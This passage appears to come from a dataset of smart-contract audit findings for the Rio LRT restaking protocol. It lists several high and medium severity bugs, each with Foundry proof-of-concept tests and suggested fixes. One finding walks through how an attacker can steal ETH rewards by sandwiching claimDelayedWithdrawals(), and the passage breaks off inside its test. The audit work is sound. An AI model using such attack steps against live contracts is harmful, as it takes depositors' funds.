`_part1` to overwrite the zero bytes from _part2:\\n```\\nmstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\nmstore(add(key1, 0x20), _part1) // Store bytes 0..31\\n```\\n\\nNote that the above change must be made for both keys.","Whenever we swapValidatorDetails using reportOutOfOrderValidatorExits, both sets of validators will have broken public keys and when allocated to will cause ETH to be permanently locked in the beacon deposit contract.\\nWe can see how this manifests in allocateETHDeposits where we retrieve the public keys for allocations:\\n```\\n// Load the allocated validator details from storage and update the deposited validator count.\\n(pubKeyBatch, signatureBatch) = ValidatorDetails.allocateMemory(newDepositAllocation);\\nVALIDATOR_DETAILS_POSITION.loadValidatorDetails(\\n operatorId, validators.deposited, newDepositAllocation, pubKeyBatch, signatureBatch, 0\\n);\\n// rest of code\\nallocations[allocationIndex] = OperatorETHAllocation(operator.delegator, newDepositAllocation, pubKeyBatch, signatureBatch);\\n```\\n\\nWe then use the public keys to stakeETH:\\n```\\n(uint256 depositsAllocated, IRioLRTOperatorRegistry.OperatorETHAllocation[] memory allocations) = operatorRegistry.allocateETHDeposits(\\n depositCount\\n);\\ndepositAmount = depositsAllocated * ETH_DEPOSIT_SIZE;\\n\\nfor (uint256 i = 0; i < allocations.length; ++i) {\\n uint256 deposits = allocations[i].deposits;\\n\\n IRioLRTOperatorDelegator(allocations[i].delegator).stakeETH{value: deposits * ETH_DEPOSIT_SIZE}(\\n deposits, allocations[i].pubKeyBatch, allocations[i].signatureBatch\\n );\\n}\\n```\\n\\nUltimately for each allocation, the public key is passed to the beacon DepositContract.deposit where it deposits to a public key for which we don't have the associated private key and thus can never withdraw.","```\\n// Swap the position of the validators starting from the `fromIndex` with the validators that were next in line to be exited.\\nVALIDATOR_DETAILS_POSITION.swapValidatorDetails(operatorId, fromIndex, validators.exited, validatorCount);\\n```\\n" +`reportOutOfOrderValidatorExits` does not updates the heap order,high,"When an operator's validator exits without a withdrawal request, the owner can invoke the `reportOutOfOrderValidatorExits` function to increase the `exited` portion of the operator validators. However, this action does not update the heap. Consequently, during subsequent allocation or deallocation processes, the heap may incorrectly mark validators as `exited`.\\nFirst, let's see how the utilization is determined for native ETH deposits for operators which is calculated as: `operatorShares.allocation.divWad(operatorShares.cap)` where as the allocation is the total `deposited` validators and the `cap` is predetermined value by the owner of the registry.\\nWhen the heap is retrieved from the storage, here how it is fetched:\\n```\\nfunction getOperatorUtilizationHeapForETH(RioLRTOperatorRegistryStorageV1.StorageV1 storage s)\\n internal\\n view\\n returns (OperatorUtilizationHeap.Data memory heap)\\n {\\n uint8 numActiveOperators = s.activeOperatorCount;\\n if (numActiveOperators == 0) return OperatorUtilizationHeap.Data(new OperatorUtilizationHeap.Operator[](0), 0);\\n\\n heap = OperatorUtilizationHeap.initialize(MAX_ACTIVE_OPERATOR_COUNT);\\n\\n uint256 activeDeposits;\\n IRioLRTOperatorRegistry.OperatorValidatorDetails memory validators;\\n unchecked {\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = s.activeOperatorsByETHDepositUtilization.get(i);\\n\\n // Non-existent operator ID. We've reached the end of the heap.\\n if (operatorId == 0) break;\\n\\n validators = s.operatorDetails[operatorId].validatorDetails;\\n activeDeposits = validators.deposited - validators.exited;\\n heap.operators[i + 1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n utilization: activeDeposits.divWad(validators.cap)\\n });\\n }\\n heap.count = i;\\n }\\n }\\n```\\n\\nas we can see, the heap is always assumed to be order in the storage when the registry fetches it initially. There are no ordering of the heap when requesting the heap initially.\\nWhen, say the deallocation happens via an user withdrawal request, the queue can exit early if the operator in the heap has ""0"" room:\\n```\\n function deallocateETHDeposits(uint256 depositsToDeallocate) external onlyCoordinator returns (uint256 depositsDeallocated, OperatorETHDeallocation[] memory deallocations) {\\n deallocations = new OperatorETHDeallocation[](s.activeOperatorCount);\\n\\n\\n OperatorUtilizationHeap.Data memory heap = s.getOperatorUtilizationHeapForETH();\\n if (heap.isEmpty()) revert NO_AVAILABLE_OPERATORS_FOR_DEALLOCATION();\\n\\n\\n uint256 deallocationIndex;\\n uint256 remainingDeposits = depositsToDeallocate;\\n\\n\\n bytes memory pubKeyBatch;\\n while (remainingDeposits > 0) {\\n uint8 operatorId = heap.getMax().id;\\n\\n\\n OperatorDetails storage operator = s.operatorDetails[operatorId];\\n OperatorValidatorDetails memory validators = operator.validatorDetails;\\n -> uint256 activeDeposits = validators.deposited - validators.exited;\\n\\n\\n // Exit early if the operator with the highest utilization rate has no active deposits,\\n // as no further deallocations can be made.\\n -> if (activeDeposits == 0) break;\\n .\\n }\\n .\\n }\\n```\\n\\n`reportOutOfOrderValidatorExits` increases the ""exited"" part of the operators validator:\\n```\\nfunction reportOutOfOrderValidatorExits(uint8 operatorId, uint256 fromIndex, uint256 validatorCount) external {\\n .\\n .\\n // Swap the position of the validators starting from the `fromIndex` with the validators that were next in line to be exited.\\n VALIDATOR_DETAILS_POSITION.swapValidatorDetails(operatorId, fromIndex, validators.exited, validatorCount);\\n -> operator.validatorDetails.exited += uint40(validatorCount);\\n\\n emit OperatorOutOfOrderValidatorExitsReported(operatorId, validatorCount);\\n }\\n```\\n\\nNow, knowing all these above, let's do an example where calling `reportOutOfOrderValidatorExits` can make the heap work wrongly and exit prematurely.\\nAssume there are 3 operators which has native ETH deposits. operatorId 1 -> utilization 5% operatorId 2 -> utilization 10% operatorId 3 -> utilization 15%\\nsuch operators would be ordered in the heap as: heap.operators[1] -> operatorId: 1, utilization: 5 heap.operators[2] -> operatorId: 2, utilization: 10 heap.operators[3] -> operatorId: 3, utilization: 15 heap.getMin() -> operatorId: 1, utilization: 5 heap.getMax() -> operatorId:3, utilization 15\\nnow, let's say the ""cap"" is 100 for all of the operators which means that: operatorId 1 -> validator.deposits = 5, validator.exit = 0 operatorId 2 -> validator.deposits = 10, validator.exit = 0 operatorId 3 -> validator.deposits = 15, validator.exit = 0\\nLet's assume that the operator 3 exits 15 validator from beacon chain without prior to a user request, which is a reason for owner to call `reportOutOfOrderValidatorExits` to increase the exited validators.\\nWhen the owner calls `reportOutOfOrderValidatorExits` for the operatorId 3, the exited will be 15 for the operatorId 3. After the call the operators validator balances will be: operatorId 1 -> validator.deposits = 5, validator.exit = 0 operatorId 2 -> validator.deposits = 10, validator.exit = 8 operatorId 3 -> validator.deposits = 15, validator.exit = 15\\nhence, the utilizations will be: operatorId 1 -> utilization 5% operatorId 2 -> utilization 10% operatorId 3 -> utilization 0%\\nwhich means now the operatorId 3 has the lowest utilization and should be the first to get deposits and last to unwind deposits from. However, the heap is not re-ordered meaning that the minimum in the heap is still opeartorId 1 and the maximum is still operatorId 3!\\nNow, when a user tries to withdraw, the first deallocation target will be the operatorId 3 because the heap thinks that it is the most utilized still.\\nHence, the user will not be able to request the withdrawal!\\nCoded PoC:\\n```\\n// forge test --match-contract OperatorUtilizationHeapTest --match-test test_RemovingValidatorMessesTheHeap -vv\\n function test_RemovingValidatorMessesTheHeap() public {\\n OperatorUtilizationHeap.Data memory heap = OperatorUtilizationHeap.initialize(5);\\n\\n // @review initialize and order 3 operators \\n heap.insert(OperatorUtilizationHeap.Operator({id: 1, utilization: 5}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 2, utilization: 10}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 3, utilization: 15}));\\n heap.store(heapStore);\\n\\n // @review mimick how the heap can be fetched from the storage initially\\n uint8 numActiveOperators = 3;\\n OperatorUtilizationHeap.Data memory newHeap = OperatorUtilizationHeap.initialize(64);\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = heapStore.get(i);\\n if (operatorId == 0) break;\\n\\n newHeap.operators[i+1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n utilization: heap.operators[operatorId].utilization\\n });\\n }\\n newHeap.count = i;\\n\\n // @review assume the reportValidatorAndExits called, and now the utilization is ""0""\\n heap.updateUtilizationByID(3, 0);\\n // @review this should be done, but the heap is not stored! \\n // heap.store(heapStore);\\n\\n console.log(""1st"", heap.operators[1].id);\\n console.log(""2nd"", heap.operators[2].id);\\n console.log(""3rd"", heap.operators[3].id);\\n console.log(""origin heaps min"", heap.getMin().id);\\n console.log(""origin heaps max"", heap.getMax().id);\\n\\n console.log(""1st"", newHeap.operators[1].id);\\n console.log(""2nd"", newHeap.operators[2].id);\\n console.log(""3rd"", newHeap.operators[3].id);\\n console.log(""new heaps min"", newHeap.getMin().id);\\n console.log(""new heaps max"", newHeap.getMax().id);\\n\\n // @review mins and maxs are mixed\\n assertEq(newHeap.getMin().id, 1);\\n assertEq(heap.getMin().id, 3);\\n assertEq(heap.getMax().id, 2);\\n assertEq(newHeap.getMax().id, 3);\\n }\\n```\\n",update the utilization in the reportOutOfOrderValidatorExits function,"Heap can be mixed, withdrawals and deposits can fail, hence I will label this as high.","```\\nfunction getOperatorUtilizationHeapForETH(RioLRTOperatorRegistryStorageV1.StorageV1 storage s)\\n internal\\n view\\n returns (OperatorUtilizationHeap.Data memory heap)\\n {\\n uint8 numActiveOperators = s.activeOperatorCount;\\n if (numActiveOperators == 0) return OperatorUtilizationHeap.Data(new OperatorUtilizationHeap.Operator[](0), 0);\\n\\n heap = OperatorUtilizationHeap.initialize(MAX_ACTIVE_OPERATOR_COUNT);\\n\\n uint256 activeDeposits;\\n IRioLRTOperatorRegistry.OperatorValidatorDetails memory validators;\\n unchecked {\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = s.activeOperatorsByETHDepositUtilization.get(i);\\n\\n // Non-existent operator ID. We've reached the end of the heap.\\n if (operatorId == 0) break;\\n\\n validators = s.operatorDetails[operatorId].validatorDetails;\\n activeDeposits = validators.deposited - validators.exited;\\n heap.operators[i + 1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n utilization: activeDeposits.divWad(validators.cap)\\n });\\n }\\n heap.count = i;\\n }\\n }\\n```\\n" +Heap is incorrectly stores the removed operator ID which can lead to division by zero in deposit/withdrawal flow,high,"An operator's strategy can be reset by the owner calling `setOperatorStrategyCaps` to ""0"". This action sets the utilization to ""0"" and removes the operator from the heap. Consequently, this means that the operator has unwound all its strategy shares and can no longer receive any more deposits. However, due to how the heap is organized, if an operator who had funds before is reset to ""0"", the heap will not successfully remove the operator. As a result, when ordering the heap, a division by ""0"" will occur, causing the transaction to revert on deposits and withdrawals indefinitely.\\nIn order to break down the issue, let's divide the issue to 2 parts which their combination is the issue itself\\n1- Heap is not removing the removed ID from the heaps storage when the operator is removed\\nWhen the operator is removed, the operator will be removed from the heap as follows:\\n```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n .\\n OperatorUtilizationHeap.Data memory utilizationHeap = s.getOperatorUtilizationHeapForStrategy(newShareCap.strategy);\\n // If the current cap is greater than 0 and the new cap is 0, remove the operator from the strategy.\\n if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n -> utilizationHeap.removeByID(operatorId);\\n }\\n .\\n\\n // Persist the updated heap to the active operators tracking.\\n -> utilizationHeap.store(s.activeOperatorsByStrategyShareUtilization[newShareCap.strategy]);\\n .\\n }\\n```\\n\\n`removeByID` calls the internal `_remove` function which is NOT removes the last element! `self.count` is decreased however, the index is still the previous value of the `self.count`\\n```\\nfunction _remove(Data memory self, uint8 i) internal pure {\\n self.operators[i] = self.operators[self.count--];\\n }\\n```\\n\\nFor example, if there are 3 operators as follows: operatorId: 1, utilization: 50% operatorId: 2, utilization: 60% operatorId: 3, utilization: 70% then, the `heap.count` would be 3 and the order would be: 1, 2, 3 in the heap heap.operators[1] = operatorId 1 heap.operators[2] = operatorId 2 heap.operators[3] = operatorId 3\\nif we remove the operator Id 2: `heap.count` = 2 order: 1,3 heap.operators[1] = operatorId 1 heap.operators[2] = operatorId 2 heap.operators[3] = operatorId 0 THIS SHOULD BE ""0"" since its removed but it is ""3"" in the current implementation!\\nAs shown here, the operators[3] should be ""0"" since there isn't any operator3 in the heap anymore but the heap keeps the value and not resets it.\\nHere a test shows the above issue:\\n```\\n// forge test --match-contract OperatorUtilizationHeapTest --match-test test_removingDoesNotUpdatesStoredHeap -vv\\n function test_removingDoesNotUpdatesStoredHeap() public {\\n OperatorUtilizationHeap.Data memory heap = OperatorUtilizationHeap.initialize(5);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 1, utilization: 50}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 2, utilization: 60}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 3, utilization: 70}));\\n heap.store(heapStore);\\n\\n console.log(""Heaps count"", heap.count);\\n console.log(""1st"", heap.operators[1].id);\\n console.log(""2nd"", heap.operators[2].id);\\n console.log(""3rd"", heap.operators[3].id);\\n\\n // remove 2\\n heap.removeByID(3);\\n heap.store(heapStore);\\n\\n console.log(""Heaps count"", heap.count);\\n console.log(""1st"", heap.operators[1].id);\\n console.log(""2nd"", heap.operators[2].id);\\n console.log(""3rd"", heap.operators[3].id);\\n }\\n```\\n\\nLogs:\\n2- When the operator cap is reseted the allocations/deallocations will not work due to above heap issue because of division by zero\\nNow, take the above example, we removed the operatorId 3 from the heap by setting its cap to ""0"". Now, there are only operators 1 and 2 active for that specific strategy. When there are idle funds in the deposit pool before the rebalance call, the excess funds that are not requested as withdrawals will be pushed to EigenLayer as follows:\\n```\\nfunction rebalance(address asset) external checkRebalanceDelayMet(asset) {\\n .\\n .\\n -> (uint256 sharesReceived, bool isDepositCapped) = depositPool().depositBalanceIntoEigenLayer(asset);\\n .\\n }\\n```\\n\\n```\\n function depositBalanceIntoEigenLayer(address asset) external onlyCoordinator returns (uint256, bool) {\\n uint256 amountToDeposit = asset.getSelfBalance();\\n if (amountToDeposit == 0) return (0, false);\\n .\\n .\\n -> return (OperatorOperations.depositTokenToOperators(operatorRegistry(), asset, strategy, sharesToAllocate), isDepositCapped);\\n }\\n```\\n\\n```\\nfunction depositTokenToOperators(\\n IRioLRTOperatorRegistry operatorRegistry,\\n address token,\\n address strategy,\\n uint256 sharesToAllocate\\n ) internal returns (uint256 sharesReceived) {\\n -> (uint256 sharesAllocated, IRioLRTOperatorRegistry.OperatorStrategyAllocation[] memory allocations) = operatorRegistry.allocateStrategyShares(\\n strategy, sharesToAllocate\\n );\\n .\\n .\\n }\\n```\\n\\n```\\nfunction allocateStrategyShares(address strategy, uint256 sharesToAllocate) external onlyDepositPool returns (uint256 sharesAllocated, OperatorStrategyAllocation[] memory allocations) {\\n -> OperatorUtilizationHeap.Data memory heap = s.getOperatorUtilizationHeapForStrategy(strategy);\\n .\\n .\\n .\\n .\\n }\\n```\\n\\n```\\nfunction getOperatorUtilizationHeapForStrategy(RioLRTOperatorRegistryStorageV1.StorageV1 storage s, address strategy) internal view returns (OperatorUtilizationHeap.Data memory heap) {\\n uint8 numActiveOperators = s.activeOperatorCount;\\n if (numActiveOperators == 0) return OperatorUtilizationHeap.Data(new OperatorUtilizationHeap.Operator[](0), 0);\\n \\n heap = OperatorUtilizationHeap.initialize(MAX_ACTIVE_OPERATOR_COUNT);\\n LibMap.Uint8Map storage operators = s.activeOperatorsByStrategyShareUtilization[strategy];\\n\\n IRioLRTOperatorRegistry.OperatorShareDetails memory operatorShares;\\n unchecked {\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = operators.get(i);\\n\\n // Non-existent operator ID. We've reached the end of the heap.\\n if (operatorId == 0) break;\\n\\n operatorShares = s.operatorDetails[operatorId].shareDetails[strategy];\\n heap.operators[i + 1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n -> utilization: operatorShares.allocation.divWad(operatorShares.cap)\\n });\\n }\\n heap.count = i;\\n }\\n }\\n```\\n\\nAs we can see in one above code snippet, the `numActiveOperators` is 3. Since the stored heaps last element is not set to ""0"" it will point to operatorId 3 which has a cap of ""0"" after the removal. This will make the\\n```\\nutilization: operatorShares.allocation.divWad(operatorShares.cap)\\n```\\n\\npart of the code to perform a division by zero and the function will revert.\\nCoded PoC:\\n```\\n// forge test --match-contract RioLRTOperatorRegistryTest --match-test test_Capped0ValidatorBricksFlow -vv\\n function test_Capped0ValidatorBricksFlow() public {\\n // Add 3 operators\\n addOperatorDelegators(reLST.operatorRegistry, address(reLST.rewardDistributor), 3);\\n\\n // The caps for each operator is 1000e18, we will delete the id 2 so we need funds there\\n // any number that is more than 1000 should be ok for that experiement \\n uint256 AMOUNT = 1002e18;\\n\\n // Allocate to cbETH strategy.\\n cbETH.approve(address(reLST.coordinator), type(uint256).max);\\n uint256 lrtAmount = reLST.coordinator.deposit(CBETH_ADDRESS, AMOUNT);\\n\\n // Push funds into EigenLayer.\\n vm.prank(EOA, EOA);\\n reLST.coordinator.rebalance(CBETH_ADDRESS);\\n\\n // Build the empty caps\\n IRioLRTOperatorRegistry.StrategyShareCap[] memory zeroStrategyShareCaps =\\n new IRioLRTOperatorRegistry.StrategyShareCap[](1);\\n zeroStrategyShareCaps[0] = IRioLRTOperatorRegistry.StrategyShareCap({strategy: CBETH_STRATEGY, cap: 0});\\n\\n // Set the caps of CBETH_STRATEGY for operator 2 as ""0""\\n reLST.operatorRegistry.setOperatorStrategyShareCaps(2, zeroStrategyShareCaps);\\n\\n // Try an another deposit, we expect revert when we do the rebalance\\n reLST.coordinator.deposit(CBETH_ADDRESS, 10e18);\\n\\n // Push funds into EigenLayer. Expect revert, due to division by ""0""\\n skip(reETH.coordinator.rebalanceDelay());\\n vm.startPrank(EOA, EOA);\\n vm.expectRevert(bytes4(keccak256(""DivWadFailed()"")));\\n reLST.coordinator.rebalance(CBETH_ADDRESS);\\n vm.stopPrank();\\n }\\n```\\n","When removing from the heap also remove the last element from the heap.\\nI am not sure of this, but this might work\\n```\\nfunction _remove(Data memory self, uint8 i) internal pure {\\n self.operators[i] = self.operators[--self.count];\\n }\\n```\\n","Core logic broken, withdrawal/deposits can not be performed.","```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n .\\n OperatorUtilizationHeap.Data memory utilizationHeap = s.getOperatorUtilizationHeapForStrategy(newShareCap.strategy);\\n // If the current cap is greater than 0 and the new cap is 0, remove the operator from the strategy.\\n if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n -> utilizationHeap.removeByID(operatorId);\\n }\\n .\\n\\n // Persist the updated heap to the active operators tracking.\\n -> utilizationHeap.store(s.activeOperatorsByStrategyShareUtilization[newShareCap.strategy]);\\n .\\n }\\n```\\n" +Ether can stuck when an operators validators are removed due to an user front-running,medium,"When a full withdrawal occurs in the EigenPod, the excess amount can remain idle within the EigenPod and can only be swept by calling a function in the delegator contract of a specific operator. However, in cases where the owner removes all validators for emergencies or any other reason, a user can frontrun the transaction, willingly or not, causing the excess ETH to become stuck in the EigenPod. The only way to recover the ether would be for the owner to reactivate the validators, which may not be intended since the owner initially wanted to remove all the validators and now needs to add them again.\\nLet's assume a Layered Relay Token (LRT) with a beacon chain strategy and only two operators for simplicity. Each operator is assigned two validators, allowing each operator to stake 64 ETH in the PoS staking via the EigenPod.\\nThis function triggers a full withdrawal from the operator's delegator EigenPod. The `queueOperatorStrategyExit` function will withdraw the entire validator balance as follows:\\n```\\nif (validatorDetails.cap > 0 && newValidatorCap == 0) {\\n // If there are active deposits, queue the operator for strategy exit.\\n if (activeDeposits > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, BEACON_CHAIN_STRATEGY);\\n .\\n }\\n .\\n } else if (validatorDetails.cap == 0 && newValidatorCap > 0) {\\n .\\n } else {\\n .\\n }\\n```\\n\\n`operatorDetails.queueOperatorStrategyExit` function will full withdraw the entire validator balance as follows:\\n```\\nfunction queueOperatorStrategyExit(IRioLRTOperatorRegistry.OperatorDetails storage operator, uint8 operatorId, address strategy) internal {\\n IRioLRTOperatorDelegator delegator = IRioLRTOperatorDelegator(operator.delegator);\\n\\n uint256 sharesToExit;\\n if (strategy == BEACON_CHAIN_STRATEGY) {\\n // Queues an exit for verified validators only. Unverified validators must by exited once verified,\\n // and ETH must be scraped into the deposit pool. Exits are rounded to the nearest Gwei. It is not\\n // possible to exit ETH with precision less than 1 Gwei. We do not populate `sharesToExit` if the\\n // Eigen Pod shares are not greater than 0.\\n int256 eigenPodShares = delegator.getEigenPodShares();\\n if (eigenPodShares > 0) {\\n sharesToExit = uint256(eigenPodShares).reducePrecisionToGwei();\\n }\\n } else {\\n .\\n }\\n .\\n }\\n```\\n\\nAs observed, the entire EigenPod shares are requested as a withdrawal, which is 64 Ether. However, a user can request a 63 Ether withdrawal before the owner's transaction from the coordinator, which would also trigger a full withdrawal of 64 Ether. In the end, the user would receive 63 Ether, leaving 1 Ether idle in the EigenPod:\\n```\\nfunction queueETHWithdrawalFromOperatorsForUserSettlement(IRioLRTOperatorRegistry operatorRegistry, uint256 amount) internal returns (bytes32 aggregateRoot) {\\n .\\n for (uint256 i = 0; i < length; ++i) {\\n address delegator = operatorDepositDeallocations[i].delegator;\\n\\n -> // Ensure we do not send more than needed to the withdrawal queue. The remaining will stay in the Eigen Pod.\\n uint256 amountToWithdraw = (i == length - 1) ? remainingAmount : operatorDepositDeallocations[i].deposits * ETH_DEPOSIT_SIZE;\\n\\n remainingAmount -= amountToWithdraw;\\n roots[i] = IRioLRTOperatorDelegator(delegator).queueWithdrawalForUserSettlement(BEACON_CHAIN_STRATEGY, amountToWithdraw);\\n }\\n .\\n }\\n```\\n\\nIn such a scenario, the queued amount would be 63 Ether, and 1 Ether would remain idle in the EigenPod. Since the owner's intention was to shut down the validators in the operator for good, that 1 Ether needs to be scraped as well. However, the owner is unable to sweep it due to MIN_EXCESS_FULL_WITHDRAWAL_ETH_FOR_SCRAPE:\\n```\\nfunction scrapeExcessFullWithdrawalETHFromEigenPod() external {\\n // @review this is 1 ether\\n uint256 ethWithdrawable = eigenPod.withdrawableRestakedExecutionLayerGwei().toWei();\\n // @review this is also 1 ether\\n -> uint256 ethQueuedForWithdrawal = getETHQueuedForWithdrawal();\\n if (ethWithdrawable <= ethQueuedForWithdrawal + MIN_EXCESS_FULL_WITHDRAWAL_ETH_FOR_SCRAPE) {\\n revert INSUFFICIENT_EXCESS_FULL_WITHDRAWAL_ETH();\\n }\\n _queueWithdrawalForOperatorExitOrScrape(BEACON_CHAIN_STRATEGY, ethWithdrawable - ethQueuedForWithdrawal);\\n }\\n```\\n\\nWhich means that owner has to set the validator caps for the operator again to recover that 1 ether which might not be possible since the owner decided to shutdown the entire validators for the specific operator.\\nAnother scenario from same root cause: 1- There are 64 ether in an operator 2- Someone requests a withdrawal of 50 ether 3- All 64 ether is withdrawn from beacon chain 4- 50 ether sent to the users withdrawal, 14 ether is idle in the EigenPod waiting for someone to call `scrapeExcessFullWithdrawalETHFromEigenPod` 5- An user quickly withdraws 13 ether 6- `withdrawableRestakedExecutionLayerGwei` is 1 ether and `INSUFFICIENT_EXCESS_FULL_WITHDRAWAL_ETH` also 1 ether. Which means the 1 ether can't be re-added to deposit pool until someone withdraws.\\nCoded PoC:\\n```\\n// forge test --match-contract RioLRTOperatorDelegatorTest --match-test test_StakeETHCalledWith0Ether -vv\\n function test_StuckEther() public {\\n uint8 operatorId = addOperatorDelegator(reETH.operatorRegistry, address(reETH.rewardDistributor));\\n address operatorDelegator = reETH.operatorRegistry.getOperatorDetails(operatorId).delegator;\\n\\n uint256 TVL = 64 ether;\\n uint256 WITHDRAWAL_AMOUNT = 63 ether;\\n RioLRTOperatorDelegator delegatorContract = RioLRTOperatorDelegator(payable(operatorDelegator));\\n\\n // Allocate ETH.\\n reETH.coordinator.depositETH{value: TVL - address(reETH.depositPool).balance}();\\n\\n\\n // Push funds into EigenLayer.\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n\\n // Verify validator withdrawal credentials.\\n uint40[] memory validatorIndices = verifyCredentialsForValidators(reETH.operatorRegistry, operatorId, 2);\\n\\n\\n // Verify and process two full validator exits.\\n verifyAndProcessWithdrawalsForValidatorIndexes(operatorDelegator, validatorIndices);\\n\\n // Withdraw some funds.\\n reETH.coordinator.requestWithdrawal(ETH_ADDRESS, WITHDRAWAL_AMOUNT);\\n uint256 withdrawalEpoch = reETH.withdrawalQueue.getCurrentEpoch(ETH_ADDRESS);\\n\\n // Skip ahead and rebalance to queue the withdrawal within EigenLayer.\\n skip(reETH.coordinator.rebalanceDelay());\\n\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n // Verify and process two full validator exits.\\n verifyAndProcessWithdrawalsForValidatorIndexes(operatorDelegator, validatorIndices);\\n\\n // Settle with withdrawal epoch.\\n IDelegationManager.Withdrawal[] memory withdrawals = new IDelegationManager.Withdrawal[](1);\\n withdrawals[0] = IDelegationManager.Withdrawal({\\n staker: operatorDelegator,\\n delegatedTo: address(1),\\n withdrawer: address(reETH.withdrawalQueue),\\n nonce: 0,\\n startBlock: 1,\\n strategies: BEACON_CHAIN_STRATEGY.toArray(),\\n shares: WITHDRAWAL_AMOUNT.toArray()\\n });\\n reETH.withdrawalQueue.settleEpochFromEigenLayer(ETH_ADDRESS, withdrawalEpoch, withdrawals, new uint256[](1));\\n\\n vm.expectRevert(bytes4(keccak256(""INSUFFICIENT_EXCESS_FULL_WITHDRAWAL_ETH()"")));\\n delegatorContract.scrapeExcessFullWithdrawalETHFromEigenPod();\\n }\\n```\\n",Make an emergency function which owner can scrape the excess eth regardless of `MIN_EXCESS_FULL_WITHDRAWAL_ETH_FOR_SCRAPE`,"Owner needs to set the caps again to recover the 1 ether. However, the validators are removed for a reason and adding operators again would probably be not intended since it was a shutdown. Hence, I'll label this as medium.","```\\nif (validatorDetails.cap > 0 && newValidatorCap == 0) {\\n // If there are active deposits, queue the operator for strategy exit.\\n if (activeDeposits > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, BEACON_CHAIN_STRATEGY);\\n .\\n }\\n .\\n } else if (validatorDetails.cap == 0 && newValidatorCap > 0) {\\n .\\n } else {\\n .\\n }\\n```\\n" +A part of ETH rewards can be stolen by sandwiching `claimDelayedWithdrawals()`,medium,"Rewards can be stolen by sandwiching the call to EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals().\\nThe protocol handles ETH rewards by sending them to the rewards distributor. There are at least 3 flows that end-up sending funds there:\\nWhen the function RioLRTOperatorDelegator::scrapeNonBeaconChainETHFromEigenPod() is called to scrape non beacon chain ETH from an Eigenpod.\\nWhen a validator receives rewards via partial withdrawals after the function EigenPod::verifyAndProcessWithdrawals() is called.\\nWhen a validator exists and has more than 32ETH the excess will be sent as rewards after the function EigenPod::verifyAndProcessWithdrawals() is called.\\nAll of these 3 flows end up queuing a withdrawal to the rewards distributor. After a delay the rewards can claimed by calling the permissionless function EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals(), this call will instantly increase the TVL of the protocol.\\nAn attacker can take advantage of this to steal a part of the rewards:\\nMint a sensible amount of `LRTTokens` by depositing an accepted asset\\nCall EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals(), after which the value of the `LRTTokens` just minted will immediately increase.\\nRequest a withdrawal for all the `LRTTokens` via RioLRTCoordinator::requestWithdrawal().\\nPOC\\nChange RioLRTRewardsDistributor::receive() (to side-step a gas limit bug:\\n```\\nreceive() external payable {\\n (bool success,) = address(rewardDistributor()).call{value: msg.value}('');\\n require(success);\\n}\\n```\\n\\nAdd the following imports to RioLRTOperatorDelegator:\\n```\\nimport {IRioLRTWithdrawalQueue} from 'contracts/interfaces/IRioLRTWithdrawalQueue.sol';\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n\\nTo copy-paste in RioLRTOperatorDelegator.t.sol:\\n```\\nfunction test_stealRewards() public {\\n address alice = makeAddr(""alice"");\\n address bob = makeAddr(""bob"");\\n uint256 aliceInitialBalance = 40e18;\\n uint256 bobInitialBalance = 40e18;\\n deal(alice, aliceInitialBalance);\\n deal(bob, bobInitialBalance);\\n vm.prank(alice);\\n reETH.token.approve(address(reETH.coordinator), type(uint256).max);\\n vm.prank(bob);\\n reETH.token.approve(address(reETH.coordinator), type(uint256).max);\\n\\n //->Operator delegator and validators are added to the protocol\\n uint8 operatorId = addOperatorDelegator(reETH.operatorRegistry, address(reETH.rewardDistributor));\\n RioLRTOperatorDelegator operatorDelegator =\\n RioLRTOperatorDelegator(payable(reETH.operatorRegistry.getOperatorDetails(operatorId).delegator));\\n\\n //-> Alice deposits ETH in the protocol\\n vm.prank(alice);\\n reETH.coordinator.depositETH{value: aliceInitialBalance}();\\n \\n //-> Rebalance is called and the ETH deposited in a validator\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Create a new validator with a 40ETH balance and verify his 